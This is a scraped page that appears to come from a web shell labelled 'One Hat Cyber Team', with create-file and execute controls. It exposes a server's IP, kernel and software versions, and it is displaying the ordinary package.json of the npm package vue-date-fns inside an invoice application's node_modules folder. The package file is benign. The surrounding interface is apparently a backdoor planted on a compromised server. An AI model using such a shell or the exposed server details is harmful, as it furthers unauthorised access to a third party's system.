⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
vue-date-fns
/
View File Name :
package.json
{ "_args": [ [ "vue-date-fns@1.1.0", "/var/www/invoice" ] ], "_from": "vue-date-fns@1.1.0", "_id": "vue-date-fns@1.1.0", "_inBundle": false, "_integrity": "sha512-9xgVtDtK97C5ztLAelecfd+lfUpYn6nGRVxuD6SCk/FiN9pr7C81qP83STcsFw4hz0MfcOinfqd8ctBarMsmpA==", "_location": "/vue-date-fns", "_phantomChildren": {}, "_requested": { "type": "version", "registry": true, "raw": "vue-date-fns@1.1.0", "name": "vue-date-fns", "escapedName": "vue-date-fns", "rawSpec": "1.1.0", "saveSpec": null, "fetchSpec": "1.1.0" }, "_requiredBy": [ "/vue-mj-daterangepicker" ], "_resolved": "https://registry.npmjs.org/vue-date-fns/-/vue-date-fns-1.1.0.tgz", "_spec": "1.1.0", "_where": "/var/www/invoice", "author": { "name": "mcibique" }, "bugs": { "url": "https://github.com/mcibique/vue-date-fns/issues" }, "dependencies": { "date-fns": "^1.29.0" }, "description": "Date filter for Vue based on the date-fns.", "devDependencies": { "@vue/test-utils": "1.0.0-beta.29", "chai": "4.2.0", "eslint": "5.16.0", "eslint-config-semistandard": "13.0.0", "eslint-config-standard": "12.0.0", "eslint-plugin-import": "2.17.3", "eslint-plugin-node": "9.1.0", "eslint-plugin-promise": "4.1.1", "eslint-plugin-standard": "4.0.0", "husky": "2.4.1", "jsdom-global": "3.0.2", "lint-staged": "8.2.0", "mocha": "6.1.4", "mocha-jsdom": "2.0.0", "vue": "2.6.10", "vue-template-compiler": "2.6.10" }, "homepage": "https://github.com/mcibique/vue-date-fns#readme", "husky": { "hooks": { "pre-commit": "lint-staged" } }, "keywords": [ "vuejs", "date", "filter", "date-filter", "date-fns" ], "license": "MIT", "lint-staged": { "*.js": [ "eslint --fix", "git add" ] }, "main": "src/index.js", "name": "vue-date-fns", "repository": { "type": "git", "url": "git+https://github.com/mcibique/vue-date-fns.git" }, "scripts": { "lint": "eslint .", "lint:fix": "npm run lint -- --fix", "test": "mocha --require ./test/setup.js './src/**/*.spec.js'", "test:watch": "npm run test -- --watch" }, "version": "1.1.0" }